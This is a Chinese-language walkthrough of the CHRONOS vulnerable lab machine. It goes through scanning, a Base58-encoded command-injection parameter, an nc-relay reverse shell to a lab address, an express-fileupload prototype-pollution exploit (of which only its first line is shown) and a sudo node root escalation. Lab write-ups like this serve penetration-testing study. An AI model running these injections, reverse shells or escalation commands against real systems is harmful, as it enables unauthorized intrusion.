CHRONOS
0x01 主机发现
1 | #建议在实际子网掩码减8 |
data:image/s3,"s3://crabby-images/001cb/001cb659a4972297083cda45b74e5b1f85bb9ecc" alt="This is an example image"
0x02 端口扫描
1 | sudo nmap -p- 10.0.2.6 |
data:image/s3,"s3://crabby-images/07ed2/07ed2dccc7f8b4b0802b4be003b8faea685cdd55" alt="This is an example image"
0x03 服务识别
1 | sudo nmap -p22,80,8000 -sV 10.0.2.6 |
data:image/s3,"s3://crabby-images/a925a/a925ab1f78a853c6d1ede8ac55f162907ce75a1a" alt="This is an example image"
0x04 Web页面探查
data:image/s3,"s3://crabby-images/7e64c/7e64c1800e6becf0ca2d75c39b20bbb38ade31d1" alt="This is an example image"
针对Web页面通常有两种思路:
1、爆破路径
此处爆破无果,不是403就是301,也许是自带的字典不够强大吧。
2、查看源码
右键查看网页源码,发现 js 脚本有点猫腻。
data:image/s3,"s3://crabby-images/15bc4/15bc4800fa24eff5741803a03939628b398233a6" alt="This is an example image"
此处80和8000端口的源码是一样的,猜想是 js 搞的鬼,这里js代码被混淆了用在线网站格式化查看
推荐使用 cyberchef,效果如下
data:image/s3,"s3://crabby-images/f0348/f0348a904114fdb3407c311c93b9476289bd1c2d" alt="This is an example image"
可以看到 js 中有个地址
1 | http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL |
0x05 编码&命令注入
抓个包看看:
data:image/s3,"s3://crabby-images/2dd9d/2dd9d064a334f446ee7db3146ce858060a9a41a7" alt="This is an example image"
可以看到,页面发出了两个请求,其中一个域名解析失败,而目标机的8000端口是开放的,猜测此处的域名解析IP应该为目标机本机,那么就试试配置本地的hosts,让整个域名指向目标机。
data:image/s3,"s3://crabby-images/924fc/924fc2fa974884a64d55a3349d62af5eabc49195" alt="This is an example image"
重新访问页面,请求加载成功
data:image/s3,"s3://crabby-images/bcacb/bcacb3b291dac5cd51d9bfa944ea54e8b72abb8c" alt="This is an example image"
单独抓取新访问请求查看参数和请求
data:image/s3,"s3://crabby-images/74d75/74d7559a4c0997f65734fbf6d2c18796b4f47891" alt="This is an example image"
发现format参数疑似编码
1 | format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL |
cyberchef 自动识别试试
data:image/s3,"s3://crabby-images/66532/66532fedb2ab81c50bfb544966ca9225a8f6d827" alt="This is an example image"
可以看到识别出编码为 Base58 ,解码内容为
1 | '+Today is %A, %B %d, %Y %H:%M:%S.' |
疑似 linux bash 命令 ,猜测后端应该执行编码指令
尝试编码堆叠注入
data:image/s3,"s3://crabby-images/8cf63/8cf632c2e6d55dcc4678992bad0084fbeda0c014" alt="This is an example image"
存在注入漏洞
data:image/s3,"s3://crabby-images/07686/07686868bedc8cd790dc2d31b7ca45a282cd13c2" alt="This is an example image"
0x06 反弹shell & 信息收集
既然有命令注入直接尝试 nc 反弹,经尝试,靶机上的 nc 没有 -e 参数,用 nc 串联的方式反弹shell
1 | &&nc 10.0.2.4 4444 | /bin/bash | 10.0.2.4 5555 |
data:image/s3,"s3://crabby-images/8932d/8932d383e00db158a4e7f7de2d40b8c9c9b5be5f" alt="This is an example image"
进行基础的信息收集,当前为普通用户,服务端用node.js搭建
data:image/s3,"s3://crabby-images/74591/745918b03db48e377eeec9d81fa4a0d54205f6b4" alt="This is an example image"
查看 /etc/passwd 得到 imera 账号有 bash 权限
data:image/s3,"s3://crabby-images/c79dd/c79dd97e70a2d74c91f54553c6831028fd021a69" alt="This is an example image"
home 目录下的 imera 目录有 user.txt文件,但只有其自身有权限
data:image/s3,"s3://crabby-images/1cc93/1cc93d41577f80abe7ee54c236c5fe096d147b94" alt="This is an example image"
0x07 提权 & 提权
现在的思路是提权,提权思路一般有
- 内核提权,uname -a
- suid 权限配置不当,通过执行高权限用户文件得到高权限。
- sudo 提权
暂时没找到可以利用的,默认命令执行的目录为 /opt/chronos,看到同级目录下还有个 chronos-v2 目录
又是一个 node.js 服务端,那就找找 node.js 框架漏洞吧
网上找到了node.js的代码注入漏洞,原理是参数污染,利用条件为开启了express-fileupload,并且 parseNested 选项为 true
data:image/s3,"s3://crabby-images/83ba1/83ba17cb3f72cd6267f6bfef5463d1feac55fd44" alt="This is an example image"
发现刚好满足条件
根据靶机条件修改EXP端口和IP信息
1 | import requests |
开启 http 服务,把文件上传到靶机,执行反弹 shell
data:image/s3,"s3://crabby-images/b11e0/b11e0d82a7177fd9b4677365420174ab19ffaeef" alt="This is an example image"
看到反弹了 imera 权限,读取 /home/imera 的user.txt,这就是个 flag,base64加密,没啥内容。
data:image/s3,"s3://crabby-images/a8396/a83960592dc4efccad0c6d033c84ff6e4c48068c" alt="This is an example image"
尝试能否提权到 root
查看拥有 sudo 权限的程序
1 | sudo -l |
data:image/s3,"s3://crabby-images/131ec/131ec607b9d710320c628b7a86cac6e1d8e9cfda" alt="This is an example image"
可以看到执行 sudo node 无需密码,那提权思路是用 node 创建一个子进程
1 | sudo node -e 'child_process.spawn("/bin/bash",{stdio:[0,1,2]})' |
data:image/s3,"s3://crabby-images/2962d/2962d7b99ecdad39aac73626e6ce03c5c0e66e8b" alt="This is an example image"
有 root 权限后在对应目录下找到了另外的flag。